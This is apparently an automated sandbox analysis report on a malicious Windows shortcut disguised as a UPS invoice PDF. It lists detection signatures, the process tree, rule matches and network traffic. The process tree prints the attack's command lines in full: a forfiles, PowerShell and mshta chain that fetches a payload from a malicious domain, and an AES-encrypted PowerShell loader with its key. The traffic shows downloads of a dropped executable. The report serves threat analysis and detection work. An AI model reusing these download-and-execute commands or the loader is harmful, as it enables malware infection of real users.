Windows Analysis Report
Invoice-UPS-218931.pdf.lnk.mal.lnk

Overview

General Information

Sample name:Invoice-UPS-218931.pdf.lnk.mal.lnk
Analysis ID:1466029
MD5:de45594e6e0700cd245eb48167b4d576
SHA1:7903bc25f029d194a31783adb0c26cc461ac2ef2
SHA256:d187de197e79e51a82eb727809d5fb6847c75104979ec9622429c2e74b55db5f
Tags:lnk
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • forfiles.exe (PID: 4936 cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage" MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
    • conhost.exe (PID: 4508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6336 cmdline: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 4996 cmdline: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 4620 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg('21A646F03E7B8D0E0144FF5C4397D6E8768C751065483745F91BB8343AB048B2246E85D2C3339FCBD44E15DFB72AFC02B9734D6A198B8C26999F960E241B32E123B9CBACA3B2719C1372506CBCE2AA66A828088A6FB1394DB34D592155F83047EFCC0A4D824F80F7CF48D2BEF262BB9D33AEED76C583D7D150E7BAB97E9A8CFDF072921223BBAC8034DB6994987DC74DEDC903018518B3F35E6537D8A19790BD95F0143B2B4B7E734D48A2B7ACD50D6D344FCF97F4EE62251F59AFEEB9CFBEAC068B301CDE9B6205C120F731D96BC22D1FC31D8EFB7366A1B397C3FEACFF206D10806BD24C4B7E075E59E404FA575B579D4A6DF851FA02F116A2F66F789FA93583B7A924750A4FCAE28D9AC0876FEE6A97B56A1C444B74CD5A3658FF272917B31D6BFD3C6ECA76779B6869B431C03C81496AFFCDED8FCE4236FE3A29ABA4886BCA3096A535D941BDB706E590E88FA7706D01704C7206EA1993D9AEAE980BE84779168990E621B6CA14C201182FADBE2BAD9E4DAF1390F82E6E15665D552AC5D16E555E1A10FA71DB534F2319ED67A298283D9D1A1751E92A4FCFB4D31F6A93918C158BDD7EABEF8738964944F2614AD2E6956D5DE3967B3DFE771C9B3D9AC0461E1DE5472BAB55BE9C8660808B51C7080DFEFD889FEB39F30E08DCD5F153CA0E79A9BD1E25A9744BC9BA6F2D4AD161933BF97501242E37612D84B24A8C7848DDFBCC7A2C27BEFFF04E49DBBC9B8747A32D22D665A58E7B75BAF2BD3F1B99490F02F1CC81FE2EC80A4698AB32FD2AD22E0A57EB4582E03B221A46AB6F38B5479E296F8F998DD6D5168DDF6BE6B26968F1BFAC528412BB40BFA973A25189BF34F62AF88628E5760F282273BD9BFF02CDBBA4D63C85B6432A4E0D9E278E71C030FC7DEAAD08193692A80FB945629DE03029A101207C5F6CCD2F2A28646261EEEFE0C2884B1E19245881C7F4019F40A3E6A22A4E0B908C58233F10BB8BD8761D051FEFC7CA6830D169C4CDCFF33B2AD164977B0CED54F545F0020ECBB4EE24B26829657385A8DE80F60CBA5D6B36691DFEC61790CF77FE52269ED867DFA5120D6F6B6FB44CDFD99729B57B18279E84006C9697187CD589F4C6670B67313C0BC55D33B4D23D49761F9323E4B3E7611C1E68CCA7234F6AAAFCDF9910AF8D82BB84B2A607C63A8B87F5F13F7E8A604B1BA722BD0E876B85A74D8B1827EF22E424DBBD1EB3B2CB9EE6A38003CEA4C37D16615F536B1FFF4B129E561
2763B59A74FF64B2E06055B8B24F5B5B7EC633F0335F3071091D7AD4106436C236007B291CF7A546785AA4B12C6C6132447EBA40F14CDC19ECBCEE70C975C7D8F0578F7FCAE5D8A2493C63EE1933513A538C7932C9E9C55084260FAE910DFE4190287225BA380E3F6B468905DB1E58629BB1A1B3C3296158A92830DA5112AF2F8E2277479FB9AFE52AB07C3BA644BDD75957ADB75241C6C23F95ACA7AF54F336FF6A8993C9D591E45CD5E243C46981298C82628286E0C5E331ACDD58AA74DFD318E226ABA7F7800F4A5F082919C70227FB9FC05B21083D3B9441D09666C4F983DFB7A8A821A080FF46F4A453A18A711C5EF4B13B318F99DE6427F6659F80C64D4FF6966E2F33DA9C9686F7E6CFD31D9E3D0AED7D73835A8C0C6222E3000D5F10C6285154E7086FF8EB7E9C110B4B86CE83C6F08FFF8D327680FE10400DA4CE7869DC78BCAD4DE74B35E05ED0B23917BD0F6A5851D6A5605D6BCB8EF5B938BB1527EE0A159BE7290D623181BFC96809099D314A1ECDB5BFB518599AB82C48092BA1049836D235A7F5883F1AC30CC53712246AF5F651DE0907D59DC5B745CBF1210DE92CDADEED7E1043B6C1F429DF3CC959506E3A55B17614E807E23F46A911829D400434C9681DBB6A3A2A0BC95862391FB8AD4E829AB55BB8430C0ECD752BB561057DE927805A181');$fcuYB = [System.Security.Cryptography.Aes]::Create();$fcuYB.Key = FwbFg('615241616D494A7A70714B63736F6771');$fcuYB.IV = New-Object byte[] 16;$uIvTQuuE = $fcuYB.CreateDecryptor();$TRZjYlWGC = $uIvTQuuE.TransformFinalBlock($JMNVEMgx, 0, $JMNVEMgx.Length);$xbgxJDMGJ = [System.Text.Encoding]::Utf8.GetString($TRZjYlWGC);$uIvTQuuE.Dispose();& $xbgxJDMGJ.Substring(0,3) $xbgxJDMGJ.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 5352 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\upsinvoice.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 7384 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7540 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1612,i,8777765815647240149,11795078331004045366,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • putty.exe (PID: 8156 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: 5EFEF6CC9CD24BAEEED71C1107FC32DF)
  • svchost.exe (PID: 1996 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Source: Process Memory Space: powershell.exe PID: 4620 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
  • 0x2361d7:$b1: ::WriteAllBytes(
  • 0x236dd5:$b1: ::WriteAllBytes(
  • 0xb3145:$s1: -join
  • 0xb558b:$s1: -join
  • 0x114511:$s1: -join
  • 0x1215e6:$s1: -join
  • 0x1249b8:$s1: -join
  • 0x12506a:$s1: -join
  • 0x126b5b:$s1: -join
  • 0x128d61:$s1: -join
  • 0x129588:$s1: -join
  • 0x129df8:$s1: -join
  • 0x12a533:$s1: -join
  • 0x12a565:$s1: -join
  • 0x12a5ad:$s1: -join
  • 0x12a5cc:$s1: -join
  • 0x12ae1c:$s1: -join
  • 0x12af98:$s1: -join
  • 0x12b010:$s1: -join
  • 0x12b0a3:$s1: -join
  • 0x12b309:$s1: -join

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6336, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, ProcessId: 4996, ProcessName: mshta.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg [...] fcuYB = [System.Security.Cryptography.Aes]::Creat
Source: Process started | Author: frack113 | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg [...] fcuYB = [System.Security.Cryptography.Aes]::Creat
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4620, TargetFilename: C:\Users\user\AppData\Roaming\putty.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\forfiles.exe" /p C:\Windows /m write.exe /c "powershell . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage", ParentImage: C:\Windows\System32\forfiles.exe, ParentProcessId: 4936, ParentProcessName: forfiles.exe, ProcessCommandLine: . mshta https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage, ProcessId: 6336, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1996, ProcessName: svchost.exe
No Snort rule has matched

AV Detection

Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage | Avira URL Cloud: Label: malware
Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage... | Avira URL Cloud: Label: malware
Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage. | Avira URL Cloud: Label: malware
Source: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage/I | Avira URL Cloud: Label: malware
Source: Invoice-UPS-218931.pdf.lnk.mal.lnk | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: unknown | HTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 5.188.88.146:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780501830.0000023F9E075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780052517.0000023F9E0D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793809350.0000023F9E076000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780480215.0000023F9A1E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr
Source: Binary string: .pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678633F40 FindFirstFileA,FindClose,12_2_00007FF678633F40
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678626B00 GetProcAddress,FindFirstFileA,CloseHandle,12_2_00007FF678626B00
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678632190 FindFirstFileA,FindClose,FindWindowA,12_2_00007FF678632190
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678600520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,12_2_00007FF678600520
Source: global traffic | HTTP traffic detected: GET /cdnusa/upsinvoice.pdf HTTP/1.1 | Host: nebulaquestcorporation.cc | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /cdnusa/putty.exe HTTP/1.1 | Host: nebulaquestcorporation.cc
Source: Joe Sandbox View | IP Address: 104.77.220.172 104.77.220.172
Source: Joe Sandbox View | ASN Name: PINDC-ASRU PINDC-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /cdnusa/invoiceupsstage HTTP/1.1 | Accept: */* | Accept-Language: en-CH | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: nebulaquestcorporation.cc | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1 | Host: armmf.adobe.com | Connection: keep-alive | Accept-Language: en-US,en;q=0.9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | If-None-Match: "78-5faa31cce96da" | If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknown | TCP traffic detected without corresponding DNS query: 104.77.220.172
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF678610DE0 recv,12_2_00007FF678610DE0
Source: global traffic | DNS traffic detected: DNS query: nebulaquestcorporation.cc
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A0.10.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000006.00000002.2769097256.00000253D7800000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.6.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000007.00000002.1668722382.000001FB004B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1668722382.000001FB004B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB102FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1725282576.000001FB10DFC000.00000004.00000800.00020000.00000000.sdmp, putty.exe.7.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.1668722382.000001FB00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.1725282576.000001FB10073000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000006.00000003.1556558495.00000253D7630000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: mshta.exe, 00000004.00000003.1790203146.0000023797674000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792532536.0000023797675000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.0000023797674000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000007.00000002.1668722382.000001FB0022B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc
Source: mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/
Source: mshta.exe, 00000004.00000003.1788162718.0000023F9A1A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781945206.00000237976AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, Invoice-UPS-218931.pdf.lnk.mal.lnk | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage
Source: powershell.exe | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage$global:?
Source: mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.00000237975FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage.
Source: mshta.exe, 00000004.00000003.1782232696.000002379763A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1792460496.000002379763A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://nebulaquestcorporation.cc/cdnusa/invoiceupsstage...
